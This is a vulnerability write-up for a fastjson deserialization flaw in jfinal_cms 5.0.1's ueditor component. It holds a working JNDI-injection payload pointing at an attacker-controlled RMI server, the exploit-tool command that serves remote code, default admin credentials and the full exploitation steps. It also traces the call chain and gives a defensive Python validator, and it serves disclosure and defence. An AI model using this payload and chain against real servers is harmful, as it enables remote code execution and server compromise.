Description
Vulnerability summary
A remote command execution vulnerability exists in jfinal_cms 5.0.1. The bundled ueditor component parses WEB-INF/classes/config.json with fastjson, and an authenticated backend user can overwrite that file with a fastjson JNDI-injection payload (com.sun.rowset.JdbcRowSetImpl). Visiting /ueditor afterwards triggers the deserialization and executes an attacker-supplied command on the server.
JDK version requirements (the target JVM must still allow remote class loading through JNDI references):
- RMI-based payload: JDK earlier than 6u141 / 7u131 / 8u121 (from those updates on, com.sun.jndi.rmi.object.trustURLCodebase defaults to false)
- LDAP-based payload: JDK earlier than 6u211 / 7u201 / 8u191 (from those updates on, com.sun.jndi.ldap.object.trustURLCodebase defaults to false)
jfinal_cms version:5.0.1
Vulnerability reproduction
JDK version used in the test: JDK 8u101 (RMI references still trusted)
On Kali, start the RMI and LDAP services with a JNDI injection tool, for example:
https://github.com/feihong-cs/JNDIExploit
Note that the jar name and the -C option in the command below come from welk1n's JNDI-Injection-Exploit rather than from that project (feihong-cs/JNDIExploit is started with -i <listen-ip> instead); either tool serves the RMI/LDAP reference and the remote class.
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe" -A 192.168.248.128
-A must be the Kali address the target can reach (192.168.248.128 in the payload below). The tool prints the rmi:// and ldap:// URLs to use. "calc.exe" runs on the jfinal_cms server, so the target here is a Windows host.
Replace the rmi:// (or ldap://) address in the payload with the URL the tool printed:

```json
{
  "a":{
    "@type":"java.lang.Class",
    "val":"com.sun.rowset.JdbcRowSetImpl"
  },
  "b":{
    "@type":"com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName":"rmi://192.168.248.128:1099/6dxg2x",
    "autoCommit":true
  }
}
```

How the payload works: entry "a" deserializes a java.lang.Class whose val names com.sun.rowset.JdbcRowSetImpl; fastjson loads that class into its type cache, which lets entry "b" pass the checkAutoType blacklist even with autoTypeSupport disabled (the cache bypass present in fastjson <= 1.2.47). Entry "b" then instantiates JdbcRowSetImpl: setDataSourceName stores the JNDI URL and setAutoCommit(true) calls connect(), which performs an InitialContext lookup on that URL and pulls the attacker's class from the RMI/LDAP server. Use an ldap:// reference instead of rmi:// for targets between 8u121 and 8u191.

Create the config.json file and paste the payload into it.
Log in to the backend management system (default credentials: admin / admin123) and open template management.
Click Replace file and upload the config.json containing the payload; this overwrites WEB-INF/classes/config.json.

Visit /ueditor: the replaced file is parsed with fastjson, the JNDI lookup fetches the attacker's class, and the calculator pops up on the server:
http://localhost:8080/jfinal_cms/ueditor
Vulnerability analysis
com.jflyfox.component.controller.Ueditor
The index method behind the /ueditor route instantiates ActionEnter.

com.baidu.ueditor.ActionEnter#ActionEnter
The ActionEnter constructor instantiates ConfigManager.

com.baidu.ueditor.ConfigManager#ConfigManager
The ConfigManager constructor calls initEnv().

com.baidu.ueditor.ConfigManager#initEnv
initEnv() reads the config file and hands its content to JSONObject.parseObject. Nothing restricts which types fastjson may instantiate, so whoever controls the file content controls the deserialization; replacing the file content with the payload above is enough.

com.baidu.ueditor.ConfigManager
The file is WEB-INF/classes/config.json. Any backend file-write primitive that can overwrite it (here, Replace file in template management, reachable with the default admin credentials) becomes fastjson deserialization and, through JdbcRowSetImpl, a JNDI lookup against an attacker-controlled server. The full chain is: Ueditor.index -> new ActionEnter -> new ConfigManager -> initEnv -> JSONObject.parseObject(config.json) -> JdbcRowSetImpl.setAutoCommit -> InitialContext.lookup.
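As an added check (example code written for this write-up, not part of jfinal_cms or ueditor), the following Python validator rejects a candidate config.json before it would reach fastjson. It flags the two things a legitimate ueditor config never contains: fastjson's "@type" key (including the java.lang.Class entry the payload uses to prime the type cache) and JNDI URLs in string values. The sample payload is copied from the reproduction steps above; the benign config is constructed in the shape ueditor ships, block comments included. The real fix in Java is to parse this file without autoType (or upgrade fastjson to a release with safeMode) and to stop the backend template feature from writing into WEB-INF/classes at all; this check is the defence-in-depth layer in front of that.

```python
"""Pre-parse check for a ueditor config.json before it reaches fastjson.

Added example for this write-up, not jfinal_cms or ueditor code. It models
the check ConfigManager.initEnv lacks: the file content goes straight to
JSONObject.parseObject, so whoever can overwrite WEB-INF/classes/config.json
controls what fastjson deserializes. A legitimate ueditor config never needs
fastjson's "@type" key or a JNDI URL, so both are treated as hard failures.
"""
import json
import re
from typing import Any, Iterator, List, Tuple

TYPE_KEY = "@type"  # fastjson's polymorphic type marker
JNDI_URL = re.compile(r"^(rmi|ldap|ldaps|iiop|corbaname)://", re.IGNORECASE)
# Classes used by the chain in this write-up; not an exhaustive gadget list.
KNOWN_GADGETS = {
    "java.lang.Class",                # primes fastjson's type cache (<= 1.2.47 bypass)
    "com.sun.rowset.JdbcRowSetImpl",  # setAutoCommit -> connect() -> JNDI lookup
}
BLOCK_COMMENT = re.compile(r"/\*[\s\S]*?\*/")  # ueditor's shipped config contains these


def walk(node: Any, path: str = "$") -> Iterator[Tuple[str, str, Any]]:
    """Yield (container path, key, value) for every entry in a parsed JSON tree."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield path, key, value
            yield from walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield path, str(i), value
            yield from walk(value, f"{path}[{i}]")


def find_fastjson_markers(text: str) -> List[str]:
    """Return findings for a candidate config.json; an empty list means it looks benign."""
    try:
        doc = json.loads(BLOCK_COMMENT.sub("", text))
    except json.JSONDecodeError as exc:
        return [f"not valid JSON after comment stripping: {exc}"]
    findings = []
    for path, key, value in walk(doc):
        if key == TYPE_KEY:
            cls = value if isinstance(value, str) else repr(value)
            kind = "known gadget" if cls in KNOWN_GADGETS else "unexpected autoType"
            findings.append(f"{path}: @type={cls} ({kind})")
        if isinstance(value, str) and JNDI_URL.match(value):
            findings.append(f"{path}.{key}: JNDI URL {value}")
    return findings


def is_safe_config(text: str) -> bool:
    """True only when the document carries no autoType marker and no JNDI URL."""
    return not find_fastjson_markers(text)


# The payload from the reproduction steps above (copied here for the demo).
PAYLOAD = """{
  "a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"},
  "b": {"@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "rmi://192.168.248.128:1099/6dxg2x",
        "autoCommit": true}
}"""

# A constructed benign config in the shape ueditor ships (keys abbreviated).
BENIGN_CONFIG = """{
  /* upload image settings */
  "imageActionName": "uploadimage",
  "imageFieldName": "upfile",
  "imageMaxSize": 2048000,
  "imageAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"],
  "imageUrlPrefix": ""
}"""

if __name__ == "__main__":
    for label, text in (("payload", PAYLOAD), ("benign", BENIGN_CONFIG)):
        print(label, "safe" if is_safe_config(text) else "REJECT")
        for line in find_fastjson_markers(text):
            print("  ", line)
```

Run stand-alone, the script reports three findings for the payload (the two @type entries and the rmi:// dataSourceName) and none for the benign config. The walker checks string values inside arrays as well, so a JNDI URL hidden in a list such as imageAllowFiles is caught too.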